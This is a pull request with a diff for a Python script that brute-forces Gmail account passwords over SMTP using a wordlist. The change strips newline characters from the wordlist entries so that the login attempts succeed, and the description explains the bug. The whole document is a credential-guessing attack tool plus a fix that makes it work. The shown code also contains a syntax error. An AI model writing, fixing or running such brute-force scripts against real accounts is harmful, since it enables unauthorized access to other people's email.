### PR TITLE
Update gmail_bruteforce.py

### DIFF
--- a/bruteforce/gmail_bruteforce.py
+++ b/bruteforce/gmail_bruteforce.py
@@ -11,7 +11,8 @@ passwords = open(passfile,"r") #Opening the password file
 #Foreach lines of password in input file
 for password in passwords:
 	try:#Trying to login and if the password matches.
-		smtpserver.login(username,password)#Then print the correct password.
+		# rsritp() to remove newline character '\n' or '\r\n'.
+		smtpserver.login(username,password.rstrip())#Then print the correct password.
 		print("[+] Password found! %s" % password)break; #Break the loop
 	except smtplib.SMTPAuthenticationError:# and if the password is wrong then.
 		print("[!] Password Incorrect %s" % password)


### PR DESCRIPTION
* Problem: if you have `something1` and `something2` in a wordlist file then `open(filename,'r')` will return `['something1\n','something2\n']`
* Solution: **rstrip()**   added to remove endline character  which are returned while reading wordlist file.